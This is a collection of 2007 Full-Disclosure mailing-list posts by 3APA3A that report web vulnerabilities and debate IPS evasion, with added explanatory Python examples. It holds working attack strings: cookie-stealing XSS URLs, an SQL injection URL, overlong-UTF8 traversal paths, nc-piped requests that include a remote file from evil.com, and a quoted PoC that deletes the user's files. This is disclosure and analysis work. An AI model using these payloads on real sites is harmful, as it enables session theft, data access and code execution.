  Classic 1.5 theme; the last one is already fixed in WordPress 2.1.3.

  Insufficient filtering of the PHP_SELF variable leads to cross-site
  scripting with a request like
  http://site/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Additional information (in Ukrainian):
 http://websecurity.com.ua/1252/
 http://websecurity.com.ua/1248/
 http://websecurity.com.ua/1238/
 http://websecurity.com.ua/1234/
  Original messages (in Russian):
 http://securityvulns.ru/Rdocument839.html
 http://securityvulns.ru/Rdocument825.html
 http://securityvulns.ru/Rdocument771.html
 http://securityvulns.ru/Rdocument751.html
  
  5. MustLive reports cross-site scripting in coWiki

  with request
  
http://site/?cmd=srchdoc&q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Additional information: http://websecurity.com.ua/1131/
  Original message: http://securityvulns.ru/Rdocument692.html

  6. Ivan Nl (http://uNkn0wn.eu) reports vulnerabilities in Linkliste 1.2,
  Butterfly online visitors counter 1.08, mcLinksCounter 1.2, My_REFERER
  1.08.

  Original messages in English are available from
  http://securityvulns.com/source26994.html

  7. Okan Alp (http://www.expw0rm.com) reports vulnerabilities in
  different Web applications.

  Original messages in English are available from
  http://securityvulns.com/source13951.html
  



-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/



Re: [Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow

2007-08-16 Thread 3APA3A
Dear Joey Mengele,

Of course, it's a mitigating factor. But:

the default PATH_MAX under Linux is 4096, and it's not hard to create a
file/folder with a longer path; it's impossible to access it.

E.g. a folder with a path longer than PATH_MAX:

bash$ pwd
pwd: could not get current directory: getcwd: cannot access parent directories: Result too large
bash$ ls
job-working-directory: could not get current directory: getcwd: cannot access parent directories: Result too large

Access is not required in this case. It's possible to create _searchable_
files with a path length up to approximately MAX_PATH + NAME_MAX. It's
more than required to exploit (4128).

--Wednesday, August 15, 2007, 9:34:50 PM, you wrote to [EMAIL PROTECTED]:

JM> You are playing handpuppet of the jackass, actually. Check PATH_MAX 
JM> in the Linux Kernel.

JM> J

JM> On Wed, 15 Aug 2007 12:53:18 -0400 monikerd <[EMAIL PROTECTED]> 
JM> wrote:
>>Joey Mengele wrote:
>>> Where does security come into play here? This is a local crash in a
>>> non setuid binary. I would like to hear your remote exploitation
>>> scenario. Or perhaps your local privilege escalation scenario?
>>>
>>> J
>>>
>>I'll play advocate of the devil then. Imagine a wiki running on a
>>webserver, that allows anybody to create new topics which end up in
>>/articles/[Topic].txt with sufficient .htaccess stuff in /articles to
>>thwart most usual attacks ..
>>
>>If you could create an arbitrary long topic, then you *might* be able
>>to execute some code, when some cronjob would scan the drive and come
>>across the file?
>>
>>Creating files is a different privilege than running code. Hence imho
>>it's not a bogus advisory.
>>
>>Another possibility would be to create an archive that extracts an
>>incredibly long filename perhaps? Scanning an archive before/after
>>it's extracted is a pretty common event i guess.




-- 
~/ZARAZA http://securityvulns.com/
...he never set about programming without a cudgel. (Lem)

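An added example, not part of the thread above, showing the point at issue on Linux (the "check PATH_MAX in the Linux Kernel" remark): a file whose absolute path is longer than PATH_MAX can be created by stepping down one directory at a time, a scanner that hands the whole path string to stat(2) then fails with ENAMETOOLONG, while openat-style traversal with dir_fd reaches the file without trouble. PATH_MAX = 4096 and the 120-character component are assumptions made for the demo; everything is created under a temporary directory and removed afterwards.

```python
import errno
import os
import shutil
import tempfile

PATH_MAX = 4096          # Linux limits.h value, assumed for this demo
COMPONENT = "A" * 120    # one directory name, well under NAME_MAX (255)


def build_deep_file(base, min_len=PATH_MAX + 256):
    """Create base/AAA.../AAA.../marker.txt whose absolute path is longer than
    PATH_MAX. Every mkdir and the final open use a relative name from the
    current directory, so no single syscall ever sees an over-long path.
    Returns the absolute path as a string (which nothing can open as-is)."""
    abs_path = os.path.abspath(base)
    saved_cwd = os.open(".", os.O_RDONLY)
    try:
        os.chdir(base)
        while len(abs_path) < min_len:
            os.mkdir(COMPONENT)
            os.chdir(COMPONENT)
            abs_path = os.path.join(abs_path, COMPONENT)
        with open("marker.txt", "w") as fh:
            fh.write("found me\n")
        return os.path.join(abs_path, "marker.txt")
    finally:
        os.fchdir(saved_cwd)
        os.close(saved_cwd)


def stat_by_absolute_path(path):
    """What a naive scanner does: hand the whole string to stat(2).
    Returns (size, None) on success or (None, errno name) on failure."""
    try:
        return os.stat(path).st_size, None
    except OSError as exc:
        return None, errno.errorcode.get(exc.errno, str(exc.errno))


def stat_by_dir_fd(path):
    """openat(2)-style descent, one component per syscall: the total path
    length is irrelevant, only each name has to fit NAME_MAX."""
    parts = [p for p in path.split("/") if p]
    fd = os.open("/", os.O_RDONLY | os.O_DIRECTORY)
    try:
        for name in parts[:-1]:
            nfd = os.open(name, os.O_RDONLY | os.O_DIRECTORY, dir_fd=fd)
            os.close(fd)
            fd = nfd
        return os.stat(parts[-1], dir_fd=fd).st_size
    finally:
        os.close(fd)


def demo():
    """Build the tree in a temp dir, probe it both ways, clean up."""
    base = tempfile.mkdtemp(prefix="deep-")
    try:
        path = build_deep_file(base)
        size_abs, err_abs = stat_by_absolute_path(path)
        return {
            "path_len": len(path),
            "absolute_size": size_abs,
            "absolute_error": err_abs,
            "dir_fd_size": stat_by_dir_fd(path),
        }
    finally:
        shutil.rmtree(base)  # fd-based on Linux, so the depth is not a problem


if __name__ == "__main__":
    print(demo())
```

The practical consequence for the cronjob scenario in the thread is that a scanner built on absolute path strings will either skip or choke on such a file, while the file is perfectly reachable for anything that walks with openat/fchdir, which is what a careful scanner (and the tools used to plant such files) should do.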

Re: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.

2007-08-06 Thread 3APA3A
Dear Andrew Farmer,

And this one is not even new:

http://seclists.org/bugtraq/2005/Jul/0521.html


--Monday, August 6, 2007, 2:40:57 PM, you wrote to [EMAIL PROTECTED]:

AF> On 05 Aug 07, at 15:48, Beyond Security wrote:
>> /*
>>  *  off by one ebp overwrite in sudo prompt parsing function
>>  *  discovered by beyond security in 2007, thx ge
>>  *
>>  *  to compile: gcc -pipe -o sobo sobo.c ; ./sobo
>>  *
>>  *  please use responsibly! a patch has already been sent
>>  *  upstream and a fix will be included in the next sudo release
>>  *
>>  */
AF> 

AF> Smashes its own stack and runs "rm -rf ~ / &". Very clever.


-- 
~/ZARAZA http://securityvulns.com/



Re: [Full-disclosure] HORDE VULNERABILITIES

2007-08-03 Thread 3APA3A
Dear Mesut EREN,

http://securityvulns.com/search/soft.asp?sofname=horde

--Thursday, August 2, 2007, 10:09:31 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

ME> Hello everybody,

ME> Does Horde Mail have any vulnerabilities?

ME> I use Horde Mail and I want to test my email system. Thanks.

ME> M.E.



-- 
~/ZARAZA http://securityvulns.com/




[Full-disclosure] [AOGBF] Re: BS.Player 2.22 NULL ptr dereference

2007-08-03 Thread 3APA3A
Dear [EMAIL PROTECTED],



 Seems to be Another One George Bush Fan.

You know, there is a vulnerability in all media players: it can be
exploited by opening an MP3 file of George Bush's bathroom singing. George
Bush fans are not vulnerable, yet they are still vulnerable to the one you
described.



Quote:

 Can you, please, explain why this is a security bug? DoS is not a software
 crash, DoS is Denial of Service. It means the security impact of a DoS
 vulnerability should be preventing (blocking) access of a legitimate user
 to some data or service (via data corruption, service malfunction, etc).



--Friday, August 3, 2007, 4:40:41 AM, you wrote to 
full-disclosure@lists.grok.org.uk:


esvnc> =================================================
esvnc> Team Intell Security Advisory TISA2007-10-Private
esvnc> -------------------------------------------------
esvnc> BS.Player 2.22 NULL pointer dereference
esvnc> =================================================


-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] Cracking the entire set of DES-based crypt(3) hashes. Interested ?

2007-07-30 Thread 3APA3A
Dear coderman,

Whhooo!  We  will not see SPAM any more, because all botnets will be
overloaded with hash hacking!

--Monday, July 30, 2007, 11:30:51 PM, you wrote to [EMAIL PROTECTED]:

c> On 7/30/07, coderman <[EMAIL PROTECTED]> wrote:
>> gotta pay off that copacobana?  10,000 hashes for breakeven @ $1, not bad...

c> yes, a joke.  you'd need to charge at least $100 hash to make this
c> profitable, maybe down to $40-50 if you could leverage bulk pricing
c> for components.

c> cmon XRR, spill the beans.  a bunch of PS3's?  FPGA array?  quantum search? :P


-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] Cracking the entire set of DES-based crypt(3) hashes. Interested ?

2007-07-30 Thread 3APA3A
Dear Tremaine Lea,



--Monday, July 30, 2007, 4:09:53 PM, you wrote to [EMAIL PROTECTED]:

TL> -BEGIN PGP SIGNED MESSAGE-
TL> Hash: SHA1

TL> $1-10/hash, and I'd actively seek/support an open source option.

5-10 days for a full bruteforce? John the Ripper on a modern multi-core PC.

-- 
~/ZARAZA http://securityvulns.com/
So, I will be brief. (Twain)


Re: [Full-disclosure] Signal to Noise Ratio

2007-07-24 Thread 3APA3A
Dear [EMAIL PROTECTED],

--Tuesday, July 24, 2007, 5:02:16 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

jkc>   It seems to me the average SNR here could be greatly improved with any
jkc> one of several commonly available "community-based" filtering
jkc> mechanisms.  Digg and Slashdot are both examples of what I'm suggesting.

This subject arises here twice a year. The list needs _professional_
moderation, like Bugtraq has, because:

1. The next thing to research will be attacks against community-based
filtering mechanisms.

2. No, thanks, I have seen enough "community moderator" things with
Wikipedia, where the sense of good always hits common sense. It's well
known who has a high desire to moderate: not a professional with deep
topic knowledge. Michael Zalewski was filtered out of "hackers" for a few
years for self-promotion (was it Stallman who edited this article or a
15-year-old schoolboy who had read nothing but a few articles about...
let me remember.. the Melissa worm?). Bad for you, Michael, you promote
yourself again! I was not able to add an article about free open source
software, as I am the only listed software developer (I really am): it's
promotion. Just wonder: if somebody looks for specific software in
Wikipedia, is it better to have a potentially promotional article from its
developer or not to have an article at all?


-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] PIRS2007 local buffer overflow vulnerability

2007-07-13 Thread 3APA3A
Dear [EMAIL PROTECTED],

Please explain why this is a "vulnerability" and not "just a bug".

--Friday, July 13, 2007, 5:26:17 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

esvnc> TeamIntell discovered local buffer overflow vulnerability 
esvnc> in PIRS2007 (data collection of companies and active 
esvnc> business subjects in Slovenia). Please see the attached 
esvnc> security advisory for details.

esvnc> Vendor has released a patch that solves this issue.
esvnc> Download link:
esvnc> http://www.pirs.si/slo/index.php?dep_id=29&help_id=60

esvnc> Edi Strosar
esvnc> (TeamIntell)


-- 
~/ZARAZA http://securityvulns.com/
When a little bird dies of gluttony, it gets put on a spit. (Lem)



Re: [Full-disclosure] TippingPoint IPS Signature Evasion

2007-07-11 Thread 3APA3A
Dear Paul Craig,

--Wednesday, July 11, 2007, 1:37:03 AM, you wrote to [EMAIL PROTECTED]:


PC> http://www.test.com/scripts%c0%afcmd.exe
PC> http://www.test.com/scripts%e0%80%afcmd.exe
PC> http://www.test.com/scripts%c1%9ccmd.exe

PC> Web servers located behind a Tippingpoint IPS device which are capable
PC> of decoding alternate Unicode characters can be accessed, and exploited
PC> without triggering the IPS device.

Can you, please, provide an example of such a server? Fatih Ozavci reported
a similar problem with Checkpoint and Halfwidth/Fullwidth Unicode; the
potential attack vector was IIS with the .Net framework, in this case IIS
seems not to be exploitable.

Blaming an IPS because it does not detect an attack which is impossible
in the wild is nonsense. Blaming a corporate-level IPS because it doesn't
detect an attack against a SOHO web server is acceptable nonsense :)

-- 
~/ZARAZA http://securityvulns.com/


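Added example (not from the advisory, the IPS vendor or the thread) of why the three encodings quoted above slip past a byte-matching IPS: C0 AF, E0 80 AF and C1 9C are overlong UTF-8 forms of '/' and '\'. A strict decoder rejects them; a lax one folds them into the ASCII character, and only then does the request look like the traversal it is. The SIGNATURES tuple and the lenient decoder are constructed for the demo, not taken from any product.

```python
from urllib.parse import unquote_to_bytes

# Signatures an IPS might carry for the classic IIS traversal, written the
# way the path looks once the server has decoded it. Constructed for the demo.
SIGNATURES = ("/scripts/cmd.exe", "/scripts\\cmd.exe", "../", "..\\")


def lenient_utf8_decode(data: bytes) -> str:
    """Decoder that honours the lead byte's length and never checks that the
    resulting code point actually needed that many bytes. This is what a lax
    server does, and it is why C0 AF, E0 80 AF and C1 9C fold into '/' and
    '\\'. Raises ValueError on bytes that are not even structurally UTF-8."""
    out, i = [], 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:
            cp, n = lead, 1
        elif 0xC0 <= lead < 0xE0:
            cp, n = lead & 0x1F, 2
        elif 0xE0 <= lead < 0xF0:
            cp, n = lead & 0x0F, 3
        elif 0xF0 <= lead < 0xF8:
            cp, n = lead & 0x07, 4
        else:
            raise ValueError("bad lead byte 0x%02x at offset %d" % (lead, i))
        for j in range(1, n):
            if i + j >= len(data) or data[i + j] & 0xC0 != 0x80:
                raise ValueError("truncated sequence at offset %d" % i)
            cp = (cp << 6) | (data[i + j] & 0x3F)
        out.append(chr(cp))
        i += n
    return "".join(out)


def naive_view(url_path: str) -> str:
    """One round of %XX decoding, bytes compared as they are: the overlong
    sequence stays as two or three non-ASCII bytes and matches nothing."""
    return unquote_to_bytes(url_path).decode("latin-1")


def classify(url_path: str):
    """Return (verdict, decoded_path, signature_hit).

    verdict is 'plain' for well-formed UTF-8, 'overlong-utf8' when strict
    decoding rejects the bytes but the lenient decoder folds them into a
    valid path, and 'undecodable' when neither decoder accepts them. An
    'overlong-utf8' verdict is itself worth an alert: no legitimate client
    emits those sequences."""
    raw = unquote_to_bytes(url_path)
    try:
        text, verdict = raw.decode("utf-8"), "plain"   # strict: rejects overlongs
    except UnicodeDecodeError:
        try:
            text, verdict = lenient_utf8_decode(raw), "overlong-utf8"
        except ValueError:
            return "undecodable", None, False
    hit = any(sig in text for sig in SIGNATURES)
    return verdict, text, hit


if __name__ == "__main__":
    for p in ("/scripts%c0%afcmd.exe", "/scripts%e0%80%afcmd.exe",
              "/scripts%c1%9ccmd.exe", "/index.html"):
        print(p, "naive:", repr(naive_view(p)), "->", classify(p))
```

The design choice is the one 3APA3A keeps making in these threads: the inspection device has to decode the way the protected server decodes, or at least recognise that a request which only makes sense under a non-standard decoding is an anomaly in its own right.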


[Full-disclosure] durito: enVivo!CMS SQL injection

2007-07-11 Thread 3APA3A
Dear [EMAIL PROTECTED],

  durito [damagelab] -durito[at]mail[dot]ru- reported an SQL injection
  vulnerability in enVivo!CMS through the ID parameter of default.asp.

  Example:

  http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)--

  Original message (in Russian): http://securityvulns.ru/Rdocument425.html

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/



[Full-disclosure] Moodle XSS / Liesbeth base CMS sensitive information disclosure

2007-07-03 Thread 3APA3A
Dear [EMAIL PROTECTED],

1.
  MustLive (mustlive at websecurity.com dot ua) reported a cross-site
  scripting vulnerability in Moodle 1.7.1 via the search parameter of
  index.php, example:

  http://host/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20

  Detailed information (in Ukrainian) http://websecurity.com.ua/1045/
  Original message (in Russian) http://securityvulns.ru/Rdocument391.html

2.
  Durito  [damagelab]  (durito at mail dot ru) reported information leak
  in Liesbeth base CMS (Vendor: www.doubleflex.com), example:
  
  http://host/config.inc

  The file, accessible through the Web, contains sensitive information,
  including the database account.

  Original message (in Russian) http://securityvulns.ru/Rdocument392.html

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/



Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-20 Thread 3APA3A
Dear Jamie Riden,

--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to [EMAIL PROTECTED]:


JR> (This is what I gathered from the original posting, but I might be wrong.)

JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,

The original BreakingPoint article the author refers to says "The intent is
describe the strange behaviors of network applications". It mentions no
IPS products, only IIS and Apache. And at least one case of Apache
behavior is partially expected (because of the RFC) and already described
(by Michal Majchrowicz).

JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:

JR> \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n

An IPS may detect known attacks. Just like antivirus, you may use an IPS to
protect against known viruses/exploits. The ability to bypass an IPS with a
new one is not a bug. I do collect different content filtering bypassing
methods:

http://securityvulns.com/advisories/content.asp

You simply MUST accept the risk that there is always a way to bypass
content filtering. An IPS doesn't protect your network by itself. An IPS
is nothing but a tool.

JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request"., when it should actually be alerting that a
JR> RFI attempt was made.

In this situation the IDS/IPS should alert that an unsupported request
attempt was made, and block this attempt in the case of an IPS.

JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that a RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )

I can write a buggy application and an attempt to exploit it will never be
detected by existing signatures.

-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-20 Thread 3APA3A
Dear H D Moore,

--Tuesday, June 19, 2007, 11:20:41 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

HDM> $  echo  -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
HDM> nc webserver 80

According to the recommendations of RFC 2616, section 4.1, a Web server or
proxy server should ignore \r\n before a request for compatibility with
odd clients sending a trailing \r\n with POST requests via keep-alive
connections:

   In the interest of robustness, servers SHOULD ignore any empty
   line(s) received where a Request-Line is expected. In other words, if
   the server is reading the protocol stream at the beginning of a
   message and receives a CRLF first, it should ignore the CRLF.

$ echo -ne " /buggy.php HTTP/1.0\r\n\r\n" | nc webserver 80

does the same job. This problem (unsupported request method) was already
reported by Michal Majchrowicz, see

http://securityvulns.com/Qdocument846.html


-- 
~/ZARAZA http://securityvulns.com/
Electric shocks are very useful for building character. (Lem)

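Added example (written for this page, not code from Apache, BreakingPoint or any IPS) of the parsing gap discussed in the two messages above: an engine that only inspects what its own strict grammar recognises as HTTP skips the request entirely, whereas one that normalises the way the server does (the RFC 2616 section 4.1 leading-CRLF rule plus word splitting modelled on a lenient tokenizer, which is an assumption about the server's behaviour) recovers the URI, flags the empty method as the "unsupported request method" anomaly and still runs the RFI signature. The sample requests are the ones quoted in the thread; RFI_VALUE is a constructed signature.

```python
import re

WHITESPACE = b" \t\x0b\x0c\r\n"

# Query value that looks like a remote-include target: any scheme a PHP
# include() will fetch, including the php:// wrapper mentioned above.
# Constructed for this example, not taken from any IDS ruleset.
RFI_VALUE = re.compile(r"(?:^|[?&])[^=&]*=(?:https?|ftp|php|data):", re.I)

# What a rule engine with a strict idea of "HTTP" accepts as a request line.
STRICT_REQUEST_LINE = re.compile(
    rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS|TRACE|CONNECT) (\S+) HTTP/\d\.\d\r\n")


def _getword_white(line: bytes):
    """Word runs up to the first whitespace byte, then the whitespace run is
    skipped. Modelled on a lenient server tokenizer (an assumption about its
    behaviour, not its code): a leading blank yields an EMPTY word, and any
    of the six ASCII whitespace bytes separates words, not just SP."""
    i = 0
    while i < len(line) and line[i] not in WHITESPACE:
        i += 1
    word, rest = line[:i], line[i:]
    j = 0
    while j < len(rest) and rest[j] in WHITESPACE:
        j += 1
    return word, rest[j:]


def server_parse(raw: bytes):
    """Server-side view of the request line: RFC 2616 s.4.1 (ignore empty
    lines before the Request-Line) plus the lenient word splitting above."""
    lines = raw.split(b"\r\n")
    while lines and lines[0] == b"":
        lines.pop(0)
    if not lines or not lines[0]:
        return None
    method, rest = _getword_white(lines[0])
    uri, version = _getword_white(rest)
    return {"method": method.decode("latin-1"),
            "uri": uri.decode("latin-1"),
            "version": version.decode("latin-1")}


def naive_ids(raw: bytes) -> str:
    """Only inspects traffic it recognises as well-formed HTTP."""
    m = STRICT_REQUEST_LINE.match(raw)
    if not m:
        return "ignored: not a valid HTTP request"
    uri = m.group(2).decode("latin-1")
    return "alert: RFI" if RFI_VALUE.search(uri) else "clean"


def aligned_ids(raw: bytes) -> str:
    """Normalises like the server, treats the server's leniency as a finding
    in itself (the 'unsupported request method' case), then runs the
    content signature on the URI it recovered."""
    req = server_parse(raw)
    if req is None:
        return "ignored: empty"
    findings = []
    if not re.fullmatch(r"[A-Z]+", req["method"]):
        findings.append("anomaly: unsupported request method")
    if RFI_VALUE.search(req["uri"]):
        findings.append("alert: RFI")
    return "; ".join(findings) or "clean"


# The requests quoted in the thread, plus a plain one and a benign one.
SAMPLES = {
    "hdm": b"\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n",
    "jamie": b"\r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n",
    "plain": b"GET /rfi.php?includedir=http://evil.com HTTP/1.0\r\n\r\n",
    "benign": b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print("%-6s naive=%-38s aligned=%s" % (name, naive_ids(raw), aligned_ids(raw)))
```

Whether the protected server really serves a request with an empty method is a property of that server and should be confirmed against it; the point of the example is that the inspection device must not stop looking just because its own grammar was stricter than the server's.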

[Full-disclosure] ShAnKaR: Simple Machines Forum CAPTCHA bypass and PHP injection

2007-06-18 Thread 3APA3A
Dear [EMAIL PROTECTED],

  ShAnKaR reported vulnerabilities in Simple Machines Forum 1.1.2
  (aka SMF) http://www.simplemachines.org/

  Original advisory (in Russian):
  http://securityvulns.ru/Rdocument271.html

1. Weak sound-based CAPTCHA protection

   In this engine the sound-CAPTCHA-based automated registration protection
   is implemented with a WAV file generated by concatenating a few
   different sound files. The developers use WAV file randomization, but
   this randomization is insufficient and can be bypassed by bruteforcing
   with known sound templates.

[EMAIL PROTECTED] smfh]$ ./captcha.pl http://localhost/smf/
nnrbv
created in 1.41827201843262 seconds
[EMAIL PROTECTED] smfh]$ ./captcha.pl http://localhost/smf/
vpubu
created in 1.49515509605408 seconds
[EMAIL PROTECTED] smfh]$ ./captcha.pl http://localhost/smf/
ntfhh
created in 2.31928586959839 seconds
[EMAIL PROTECTED] smfh]$ ./captcha.pl http://localhost/smf/
egudz
created in 0.823321104049683 seconds

  As can be seen, the bruteforce usually takes only 1-2 seconds. See the
  script attached.

2. PHP injection

There is a possibility to execute arbitrary PHP code during creation or
editing of a forum message.
(No further details are given by the advisory author.)




-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

capcha.pl
Description: Binary data

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
Dear kingcope,

With debugging it looks quite harmless:

Server Error in '/' Application.


Directory '\\.\aux' does not exist. Failed to start monitoring file changes. 
Description: An unhandled exception occurred during the execution of the 
current web request. Please review the stack trace for more information about 
the error and where it originated in the code. 

Exception Details: System.Web.HttpException: Directory '\\.\aux' does not 
exist. Failed to start monitoring file changes.

Source Error: 

An unhandled exception was generated during the execution of the current web 
request. Information regarding the origin and location of the exception can be 
identified using the exception stack trace below.  

Stack Trace: 


[HttpException (0x80070002): Directory '\\.\aux' does not exist. Failed to 
start monitoring file changes.]
   System.Web.FileChangesMonitor.FindDirectoryMonitor(String dir, Boolean 
addIfNotFound, Boolean throwOnError) +527
   System.Web.FileChangesMonitor.StartMonitoringPath(String alias, 
FileChangeEventHandler callback) +477
   System.Web.Caching.CacheDependency.Init(Boolean isPublic, Boolean 
isSensitive, String[] filenamesArg, String[] cachekeysArg, CacheDependency 
dependency, DateTime utcStart) +1535
   System.Web.Caching.CacheDependency..ctor(Boolean isSensitive, String[] 
filenames, DateTime utcStart) +50
   
System.Web.Configuration.HttpConfigurationSystem.GetCacheDependencies(Hashtable 
cachedeps, DateTime utcStart) +151
   System.Web.Configuration.HttpConfigurationSystem.ComposeConfig(String 
reqPath, IHttpMapPath configmap) +760
   System.Web.HttpContext.GetCompleteConfigRecord(String reqpath, IHttpMapPath 
configmap) +434
   System.Web.HttpContext.GetCompleteConfig() +49
   System.Web.HttpContext.GetConfig(String name) +195
   System.Web.CustomErrors.GetSettings(HttpContext context, Boolean canThrow) 
+20
   System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow) +39
   System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext 
context, Exception e) +486

 



Version Information: Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET 
Version:1.1.4322.2032 

--Wednesday, May 23, 2007, 1:35:17 PM, you wrote to [EMAIL PROTECTED]:

k> Btw,
k> Here is a screenshot of the effect.


k> -Original Message-
k> From: kingcope [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EMAIL PROTECTED]'
k> Subject: RE: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> and in the exception backtrace of IIS it tries to access \\.\AUX
k> or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's a vulnerability regardless of the DoS impact, because it allows an
k> attacker to access special DOS devices (COM1 in this case). E.g. it could
k> be used to read data from a device attached to COM1 or to prevent another
k> application from accessing this port (or LPT), because access to ports is
k> exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond than
k>> normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some servers
k>> on the internet get quite unstable, some do not. On some servers after I
k>> stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> # When sending multiple parallel GET requests to a IIS 6.0 server requesting
k>> # /AUX/.aspx the server gets unstable and non-responsive. This happens only
k>> # to servers which respond with a runtime error (System.Web.HttpException)
k>> # and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> # signed,
k>> # Kingcope [EMAIL PROTECTED]
k>>
k> 

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
Dear kingcope,

Funny enough, there is a chance this vulnerability can also be exploited
for local unauthorized access or privilege escalation, to execute a
user-supplied .aspx script from the COM port (via serial cable) without
having console access, with the permissions of the Web application.
IWAM_%COMPUTERNAME% is the default, but it's often elevated for
application pools for different reasons.

Needs to be tested though.

The same vulnerability existed in IndigoPerl some time ago. See "One more
funny bug" in http://securityvulns.com/docs6145.html


--Wednesday, May 23, 2007, 12:54:35 PM, you wrote to [EMAIL PROTECTED]:

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> and in the exception backtrace of IIS it tries to access \\.\AUX
k> or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -----Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's a vulnerability regardless of the DoS impact, because it allows an
k> attacker to access special DOS devices (COM1 in this case). E.g. it could
k> be used to read data from a device attached to COM1 or to prevent another
k> application from accessing this port (or LPT), because access to ports is
k> exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond than
k>> normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some servers
k>> on the internet get quite unstable, some do not. On some servers after I
k>> stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> # When sending multiple parallel GET requests to a IIS 6.0 server requesting
k>> # /AUX/.aspx the server gets unstable and non-responsive. This happens only
k>> # to servers which respond with a runtime error (System.Web.HttpException)
k>> # and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> # signed,
k>> # Kingcope [EMAIL PROTECTED]
k>> ##########################################################################
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this from a Linux system
k>> ##########################################################################

k>> use IO::Socket;
k>> use threads;

k>> if ($ARGV[0] eq "") { exit; }
